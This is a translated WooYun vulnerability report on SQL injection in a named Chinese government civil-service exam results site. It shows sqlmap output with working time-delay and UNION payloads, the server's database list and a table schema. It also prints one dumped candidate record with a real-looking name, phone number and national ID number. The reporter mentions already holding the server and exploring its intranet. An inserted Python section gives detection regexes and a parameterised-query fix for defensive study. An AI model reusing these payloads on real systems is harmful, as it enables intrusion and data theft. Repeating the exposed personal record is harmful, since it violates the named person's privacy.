WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online viewer -------------- http://drop.zone.ci/
2015-06-03: Details reported to the vendor, awaiting vendor handling
2015-06-05: Vendor confirmed; details disclosed to the vendor only
2015-06-15: Details disclosed to core white hats and relevant domain experts
2015-06-25: Details disclosed to ordinary white hats
2015-07-05: Details disclosed to intern white hats
2015-07-20: Details disclosed to the public
Injection... already checked, no duplicate.
http://www.whrsks.gov.cn:8065/cjcx/zcjsj_2015_01/index.asp has an injection, with sa privileges; the important part is what's below... it's mostly civil-servant records... the server has already been obtained, looking for some intranet roaming~~~~
[14:28:03] [INFO] testing connection to the target URL
[14:28:03] [INFO] searching for forms
[#1] form:
POST http://www.whrsks.gov.cn:8065/cjcx/zcjsj_2015_01/look.asp
POST data: sfzh=&xm=&submit3=%B5%E3%BB%F7%CC%E1%BD%BB
do you want to test this form? [Y/n/q]
> Edit POST data [default: sfzh=&xm=&submit3=%B5%E3%BB%F7%CC%E1%BD%BB] (Warning: blank fields detected):
do you want to fill blank fields with random values? [Y/n]
[14:28:04] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:28:04] [INFO] using 'C:\Users\Administrator\.sqlmap\output\results-06032015_0228pm.csv' as the CSV results file in multiple targets mode
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: xm (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: sfzh=MsjH&xm=';WAITFOR DELAY '0:0:5'--&submit3=%B5%E3%BB%F7%CC%E1%BD%BB

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: sfzh=MsjH&xm=' UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(113)+CHAR(99)+CHAR(65)+CHAR(72)+CHAR(121)+CHAR(76)+CHAR(87)+CHAR(102)+CHAR(117)+CHAR(87)+CHAR(81)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL-- &submit3=%B5%E3%BB%F7%CC%E1%BD%BB
---
do you want to exploit this SQL injection? [Y/n]
[14:28:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[14:28:05] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\Administrator\.sqlmap\output\results-06032015_0228pm.csv'
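An added example, written for this page and not taken from the report or from the site's own code. It takes the two payloads sqlmap reported against the xm field and shows, in Python, what they look like once the form body is decoded with the form's own charset, what a look.asp that concatenates both fields into its SQL would hand to SQL Server (the page does not show the real source, so that query text is hypothetical), a signature check that flags such payloads in request logs, and, for the fix suggested at the end of the report, a parameterised lookup in which the same payload is bound as a value and simply matches nothing. Assumptions: the form is GBK-encoded (inferred from the page's submit value, %B5%E3%BB%F7%CC%E1%BD%BB, which decodes to 点击提交); the table and column names, the sample ID number and the name 张三 are constructed; an in-memory SQLite table stands in for the SQL Server one, so the time-delay payload is shown being neutralised rather than executed.

```python
import re
import sqlite3
from urllib.parse import parse_qsl, urlencode

# Charset inferred from the form's submit value on the page:
# %B5%E3%BB%F7%CC%E1%BD%BB is "点击提交" in GBK. Decoding as UTF-8 would
# corrupt Chinese names in xm before any rule sees them.
FORM_CHARSET = "gbk"

# Signatures for the two techniques sqlmap reported against the xm field.
SIGNATURES = {
    "stacked-query time delay": re.compile(r";\s*WAITFOR\s+DELAY\s+'", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "comment terminator": re.compile(r"--\s*$|/\*"),
}


def encode_form(fields: dict) -> str:
    """Percent-encode a form body the way the GBK page would submit it."""
    return urlencode(fields, encoding=FORM_CHARSET)


def decode_form(body: str) -> dict:
    """Decode a raw POST body with the form's own charset."""
    return dict(parse_qsl(body, keep_blank_values=True, encoding=FORM_CHARSET))


def find_injection(body: str) -> list:
    """Return (field, signature name) for every decoded field matching a rule."""
    hits = []
    for field, value in decode_form(body).items():
        for name, pattern in SIGNATURES.items():
            if pattern.search(value):
                hits.append((field, name))
    return hits


def build_vulnerable_query(sfzh: str, xm: str) -> str:
    """Hypothetical reconstruction of a look.asp that concatenates both fields
    into its SQL (the site's source is not on the page). It shows why a quote
    in xm ends the literal, ';' starts a second statement on SQL Server, and
    the trailing '--' comments out the closing quote the page appends."""
    return f"SELECT * FROM cjcx.dbo.results WHERE sfzh='{sfzh}' AND xm='{xm}'"


def safe_lookup(sfzh: str, xm: str) -> list:
    """Parameterised lookup, the fix the report asks for. A constructed
    in-memory SQLite table stands in for the SQL Server one; the driver binds
    the two values, so a payload in xm is compared as a name, never run."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE scores (sfzh TEXT, xm TEXT, total REAL)")
    conn.execute("INSERT INTO scores VALUES (?, ?, ?)",
                 ("110101190001011234", "张三", 53.65))  # constructed row
    rows = conn.execute(
        "SELECT xm, total FROM scores WHERE sfzh = ? AND xm = ?", (sfzh, xm)
    ).fetchall()
    conn.close()
    return rows


# Constructed sample requests: a legitimate lookup plus the two payloads
# quoted in the sqlmap output above (CHAR chain shortened).
SAMPLES = {
    "benign": encode_form({"sfzh": "", "xm": "张三", "submit3": "点击提交"}),
    "time": encode_form({"sfzh": "MsjH",
                         "xm": "';WAITFOR DELAY '0:0:5'--",
                         "submit3": "点击提交"}),
    "union": encode_form({"sfzh": "MsjH",
                          "xm": "' UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(120),NULL,NULL,NULL,NULL-- ",
                          "submit3": "点击提交"}),
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, body)
        print("  decoded xm:", repr(decode_form(body)["xm"]))
        print("  hits:", find_injection(body))
    print(build_vulnerable_query("MsjH", "';WAITFOR DELAY '0:0:5'--"))
    print(safe_lookup("MsjH", "';WAITFOR DELAY '0:0:5'--"))   # []
    print(safe_lookup("110101190001011234", "张三"))          # [('张三', 53.65)]
```

The charset step matters in practice: a WAF or log parser that decodes this form as UTF-8 will see mojibake in xm and may still match the ASCII payload, but it will misreport the field contents and can miss multi-byte tricks that straddle the GBK boundary, so decode with the charset the application actually uses.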
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[14:30:40] [INFO] fetching database names
[14:30:40] [INFO] the SQL query used returns 29 entries
available databases [29]:
[*] CE_2015
[*] ceshi
[*] chinaexam_14gwy
[*] chinaexam_14sy_sz
[*] chinaexam_15gwy
[*] chinaexam_15jsj
[*] chinaexam_15sy_hc
[*] chinaexam_15sy_rc
[*] chinaexam_15sy_rs
[*] chinaexam_15sy_sz
[*] chinaexam_15sy_wd
[*] chinaexam_gwybmTel
[*] Chinaexam_sybmtel_hc
[*] Chinaexam_sybmtel_rc
[*] Chinaexam_sybmtel_rs
[*] Chinaexam_sybmtel_sz
[*] Chinaexam_sybmtel_wd
[*] chinaexam_zy
[*] chinaexamda
[*] chinaexamwj
[*] cjcx
[*] jeecms_2_3_2_final
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] shizhi
[*] tempdb
Quite a few personnel-exam databases...
Database: cjcx
Table: gwy_2011_2
[32 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| F29        | nvarchar |
| F30        | nvarchar |
| F31        | nvarchar |
| 两年基层工 | nvarchar |
| 公安       | float    |
| 准考证号   | nvarchar |
| 出生日期   | float    |
| 备注       | nvarchar |
| 姓名       | nvarchar |
| 学位       | nvarchar |
| 学历       | nvarchar |
| 工作单位   | nvarchar |
| 工作时间   | float    |
| 性别       | nvarchar |
| 总成绩     | float    |
| 户口所在地 | nvarchar |
| 所学专业   | nvarchar |
| 报名序号   | nvarchar |
| 报考职位   | nvarchar |
| 报考职位代 | nvarchar |
| 报考部门   | nvarchar |
| 报考部门代 | nvarchar |
| 政治面貌   | nvarchar |
| 本职位名次 | float    |
| 毕业时间   | float    |
| 毕业院校   | nvarchar |
| 民族       | nvarchar |
| 申论       | float    |
| 考生身份   | nvarchar |
| 联系电话   | nvarchar |
| 行测       | float    |
| 身份证号   | nvarchar |
+------------+----------+
[14:56:36] [WARNING] table 'cjcx.dbo.dtproperties' dumped to CSV file 'C:\Documents and Settings\king7$\.sqlmap\output\www.whrsks.gov.cn\dump\cjcx\dtproperties-b245fdb6.csv'
[14:56:36] [INFO] fetching columns for table 'gwy_2011_2' in database 'cjcx'
[14:56:36] [INFO] the SQL query used returns 32 entries
[14:56:36] [INFO] fetching entries for table 'gwy_2011_2' in database 'cjcx'
[14:56:36] [INFO] the SQL query used returns 10012 entries
[14:56:37] [INFO] retrieved: " "," "," ","否","0","1110010102","32336","","宋雨露...
[14:58:30] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
10,012 entries, but since sqlmap's table dumping is really too slow,
Database: cjcx
Table: gwy_2011_2
[1 entry, shown one column per row]
+------------+--------------------------------------------------+
| Column     | Value                                            |
+------------+--------------------------------------------------+
| 性别       | 女                                               |
| 行测       | 46.8                                             |
| 学历       | 本科                                             |
| 民族       | 汉族                                             |
| 备注       | <blank>                                          |
| 姓名       | 宋雨露                                           |
| 公安       | 0                                                |
| 申论       | 60.5                                             |
| 学位       | 学士                                             |
| 总成绩     | 53.65                                            |
| F29        | NULL                                             |
| F30        | NULL                                             |
| F31        | NULL                                             |
| 毕业院校   | 济宁学院                                         |
| 报名序号   | 000199                                           |
| 报考职位   | 1人,普通管理,面向社会,本科/学士及以上,详见简章   |
| 政治面貌   | 共青团员                                         |
| 准考证号   | 1110010102                                       |
| 报考部门   | 中共威海市委宣传部                               |
| 毕业时间   | 40725                                            |
| 工作时间   | 40725                                            |
| 考生身份   | 应届毕业生                                       |
| 联系电话   | 13553194779                                      |
| 身份证号   | 371082198807120026                               |
| 工作单位   | 无                                               |
| 出生日期   | 32336                                            |
| 所学专业   | 汉语言文学                                       |
| 报考职位代 | 10001001                                         |
| 两年基层工 | 否                                               |
| 户口所在地 | 威海                                             |
| 报考部门代 | 10001                                            |
| 本职位名次 | 74                                               |
+------------+--------------------------------------------------+
Fix the injection...
Severity: High
Vulnerability Rank: 11
Confirmed: 2015-06-05 17:18
CNVD confirmed and reproduced the described issue; it has been passed to CNCERT and sent down to the Shandong branch center, which will coordinate handling with the organisation that operates the website.
None